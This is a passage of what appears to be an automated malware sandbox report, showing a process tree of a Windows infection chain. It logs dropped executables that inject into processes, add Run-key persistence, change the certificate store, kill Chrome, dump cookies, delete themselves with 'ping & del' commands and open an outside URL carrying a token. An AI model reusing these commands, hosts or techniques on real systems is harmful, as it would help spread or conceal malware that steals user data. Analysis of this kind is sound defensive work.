                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k14mapep.xin\google-game.exe & exit
                                                                                                                15⤵
                                                                                                                  PID:7436
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\k14mapep.xin\google-game.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\k14mapep.xin\google-game.exe
                                                                                                                    16⤵
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:2472
                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\patch.dll",patch
                                                                                                                      17⤵
                                                                                                                      • Modifies registry class
                                                                                                                      PID:5624
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wpqdtlol.fvn\askinstall31.exe & exit
                                                                                                                  15⤵
                                                                                                                    PID:6840
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\wpqdtlol.fvn\askinstall31.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\wpqdtlol.fvn\askinstall31.exe
                                                                                                                      16⤵
                                                                                                                        PID:2400
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                          17⤵
                                                                                                                            PID:5328
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /f /im chrome.exe
                                                                                                                              18⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              PID:4012
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\40rqvw2n.k4h\toolspab1.exe & exit
                                                                                                                        15⤵
                                                                                                                          PID:7924
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\40rqvw2n.k4h\toolspab1.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\40rqvw2n.k4h\toolspab1.exe
                                                                                                                            16⤵
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            PID:7860
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\40rqvw2n.k4h\toolspab1.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\40rqvw2n.k4h\toolspab1.exe
                                                                                                                              17⤵
                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                              PID:7456
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l4rrz120.1s0\setup_10.2_mix.exe & exit
                                                                                                                          15⤵
                                                                                                                            PID:6272
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\l4rrz120.1s0\setup_10.2_mix.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\l4rrz120.1s0\setup_10.2_mix.exe
                                                                                                                              16⤵
                                                                                                                                PID:2892
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uxx1ekjf.vys\a1207b55.exe & exit
                                                                                                                              15⤵
                                                                                                                                PID:4384
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\uxx1ekjf.vys\a1207b55.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\uxx1ekjf.vys\a1207b55.exe
                                                                                                                                  16⤵
                                                                                                                                    PID:5816
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gocg1w1u.bf0\app.exe /8-2222 & exit
                                                                                                                                  15⤵
                                                                                                                                    PID:2676
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\gocg1w1u.bf0\app.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\gocg1w1u.bf0\app.exe /8-2222
                                                                                                                                      16⤵
                                                                                                                                        PID:5880
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\gocg1w1u.bf0\app.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\gocg1w1u.bf0\app.exe" /8-2222
                                                                                                                                          17⤵
                                                                                                                                            PID:5892
                                                                                                                              • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe
                                                                                                                                "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
                                                                                                                                11⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:1268
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-9LS9J.tmp\lylal220.tmp
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-9LS9J.tmp\lylal220.tmp" /SL5="$20538,298214,214528,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
                                                                                                                                  12⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:5588
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-6UNH7.tmp\ysAGEL.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-6UNH7.tmp\ysAGEL.exe" /S /UID=lylal220
                                                                                                                                    13⤵
                                                                                                                                    • Drops file in Drivers directory
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Adds Run key to start application
                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                    PID:7468
                                                                                                                                    • C:\Program Files\Internet Explorer\HRXVIQCSKM\irecord.exe
                                                                                                                                      "C:\Program Files\Internet Explorer\HRXVIQCSKM\irecord.exe" /VERYSILENT
                                                                                                                                      14⤵
                                                                                                                                        PID:6948
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-01O1T.tmp\irecord.tmp
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-01O1T.tmp\irecord.tmp" /SL5="$60058,5922518,66560,C:\Program Files\Internet Explorer\HRXVIQCSKM\irecord.exe" /VERYSILENT
                                                                                                                                          15⤵
                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                          PID:4864
                                                                                                                                          • C:\Program Files (x86)\i-record\i-record.exe
                                                                                                                                            "C:\Program Files (x86)\i-record\i-record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                            16⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            PID:7272
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2f-f14ab-834-5c088-52f3e7cad4988\Foshuwibece.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\2f-f14ab-834-5c088-52f3e7cad4988\Foshuwibece.exe"
                                                                                                                                        14⤵
                                                                                                                                        • Checks computer location settings
                                                                                                                                        PID:4240
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\84-0be4a-dae-13fa5-14416b9c88a6f\Vyjuduwiga.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\84-0be4a-dae-13fa5-14416b9c88a6f\Vyjuduwiga.exe"
                                                                                                                                        14⤵
                                                                                                                                          PID:7576
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y1mxezxd.md4\gaooo.exe & exit
                                                                                                                                            15⤵
                                                                                                                                              PID:4196
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kmt12sro.ugx\jgjg_note8876.exe & exit
                                                                                                                                              15⤵
                                                                                                                                                PID:5420
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\kmt12sro.ugx\jgjg_note8876.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\kmt12sro.ugx\jgjg_note8876.exe
                                                                                                                                                  16⤵
                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                  PID:6016
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pvm4djyp.fdt\google-game.exe & exit
                                                                                                                                                15⤵
                                                                                                                                                  PID:4480
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\pvm4djyp.fdt\google-game.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\pvm4djyp.fdt\google-game.exe
                                                                                                                                                    16⤵
                                                                                                                                                      PID:5816
                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\patch.dll",patch
                                                                                                                                                        17⤵
                                                                                                                                                          PID:8156
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\djy3oqpf.o21\askinstall31.exe & exit
                                                                                                                                                      15⤵
                                                                                                                                                        PID:5352
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\djy3oqpf.o21\askinstall31.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\djy3oqpf.o21\askinstall31.exe
                                                                                                                                                          16⤵
                                                                                                                                                            PID:4680
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                              17⤵
                                                                                                                                                                PID:7956
                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                  taskkill /f /im chrome.exe
                                                                                                                                                                  18⤵
                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                  PID:5300
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fopfx5aa.gng\toolspab1.exe & exit
                                                                                                                                                            15⤵
                                                                                                                                                              PID:3828
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\fopfx5aa.gng\toolspab1.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\fopfx5aa.gng\toolspab1.exe
                                                                                                                                                                16⤵
                                                                                                                                                                  PID:1432
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\fopfx5aa.gng\toolspab1.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\fopfx5aa.gng\toolspab1.exe
                                                                                                                                                                    17⤵
                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                    PID:4616
                                                                                                                                                      • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Adsbrowser.exe
                                                                                                                                                        "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Adsbrowser.exe"
                                                                                                                                                        11⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                        PID:6336
                                                                                                                                                      • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\BarSetpFile.exe
                                                                                                                                                        "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\BarSetpFile.exe"
                                                                                                                                                        11⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:6276
                                                                                                                                                      • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\sskiper.exe
                                                                                                                                                        "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\sskiper.exe"
                                                                                                                                                        11⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:6268
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2033075140.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\2033075140.exe
                                                                                                                                                          12⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          PID:5980
                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                            13⤵
                                                                                                                                                              PID:2068
                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                              13⤵
                                                                                                                                                                PID:5000
                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                13⤵
                                                                                                                                                                  PID:7264
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\823811827.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\823811827.exe
                                                                                                                                                                12⤵
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                PID:7996
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\823811827.exe
                                                                                                                                                                  "{path}"
                                                                                                                                                                  13⤵
                                                                                                                                                                    PID:1052
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\sskiper.exe & exit
                                                                                                                                                                  12⤵
                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                  PID:5816
                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                    ping 0
                                                                                                                                                                    13⤵
                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                    PID:6368
                                                                                                                                                              • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe
                                                                                                                                                                "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe"
                                                                                                                                                                11⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:6216
                                                                                                                                                                • C:\ProgramData\2981160.exe
                                                                                                                                                                  "C:\ProgramData\2981160.exe"
                                                                                                                                                                  12⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:7376
                                                                                                                                                                • C:\ProgramData\724985.exe
                                                                                                                                                                  "C:\ProgramData\724985.exe"
                                                                                                                                                                  12⤵
                                                                                                                                                                    PID:7404
                                                                                                                                                                    • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                      "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                      13⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:8000
                                                                                                                                                                  • C:\ProgramData\3609111.exe
                                                                                                                                                                    "C:\ProgramData\3609111.exe"
                                                                                                                                                                    12⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    PID:7544
                                                                                                                                                                    • C:\ProgramData\3609111.exe
                                                                                                                                                                      "{path}"
                                                                                                                                                                      13⤵
                                                                                                                                                                        PID:6944
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\aabxod3cg3a\sqd1horiyqc.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\aabxod3cg3a\sqd1horiyqc.exe"
                                                                                                                                                              8⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                              PID:6064
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\aabxod3cg3a\sqd1horiyqc.exe"
                                                                                                                                                                9⤵
                                                                                                                                                                  PID:6244
                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                    ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                    10⤵
                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                    PID:6584
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\kkrih55cwrc\KiffApp1.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\kkrih55cwrc\KiffApp1.exe"
                                                                                                                                                                8⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:4336
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\nkmuqcmfouc\app.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\nkmuqcmfouc\app.exe" /8-23
                                                                                                                                                                8⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:4936
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\nkmuqcmfouc\app.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\nkmuqcmfouc\app.exe" /8-23
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:7180
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\kfattrorfpd\vpn.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\kfattrorfpd\vpn.exe" /silent /subid=482
                                                                                                                                                                  8⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:5548
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\2f20qw223zu\IBInstaller_97039.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\2f20qw223zu\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                                                                                                                  8⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:6296
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-3B170.tmp\IBInstaller_97039.tmp
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-3B170.tmp\IBInstaller_97039.tmp" /SL5="$2040A,10078909,721408,C:\Users\Admin\AppData\Local\Temp\2f20qw223zu\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                                                                                                                    9⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                    PID:6416
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "cmd.exe" /c start http://leatherclothesone.xyz/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
                                                                                                                                                                      10⤵
                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                      PID:6620
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-7K21H.tmp\{app}\vdi_compiler.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-7K21H.tmp\{app}\vdi_compiler"
                                                                                                                                                                      10⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:6696
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-7K21H.tmp\{app}\vdi_compiler.exe"
                                                                                                                                                                        11⤵
                                                                                                                                                                          PID:7992
                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                            ping localhost -n 4
                                                                                                                                                                            12⤵
                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                            PID:3964
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\5bkhb4d1lh2\toy5ygn1gkx.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\5bkhb4d1lh2\toy5ygn1gkx.exe" /quiet SILENT=1 AF=756
                                                                                                                                                                    8⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                    • Modifies system certificate store
                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                    PID:6344
                                                                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\5bkhb4d1lh2\toy5ygn1gkx.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\5bkhb4d1lh2\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617976626 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
                                                                                                                                                                      9⤵
                                                                                                                                                                        PID:4260
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\zsblxopnict\setup_10.2_us3.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\zsblxopnict\setup_10.2_us3.exe" /silent
                                                                                                                                                                      8⤵
                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                      PID:5932
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\HPQVZ8QE88\setups.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\HPQVZ8QE88\setups.exe" ll
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:3928
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-V1DA8.tmp\setups.tmp
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-V1DA8.tmp\setups.tmp" /SL5="$60254,726852,244736,C:\Users\Admin\AppData\Local\Temp\HPQVZ8QE88\setups.exe" ll
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  PID:2780
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                              • Modifies registry class
                                                                                                                                                              PID:4436
                                                                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                "C:\Windows\System32\WScript.exe" "C:\Program Files\unins0000.vbs"
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:4348
                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:4784
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:4712
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:5372
                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                      taskkill /f /im chrome.exe
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:5988
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:5704
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe" >> NUL
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Maps connected drives based on registry
                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:4116
                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                      ping 127.0.0.1
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                      PID:6136
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                  PID:2736
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:4516
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:1624
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:6148
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:7800
                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                    PID:5400
                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                    PID:5648
                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                    PID:5984
                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    PID:5796
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-V2GJI.tmp\vpn.tmp
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-V2GJI.tmp\vpn.tmp" /SL5="$4046E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\kfattrorfpd\vpn.exe" /silent /subid=482
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    • Modifies system certificate store
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                    PID:4108
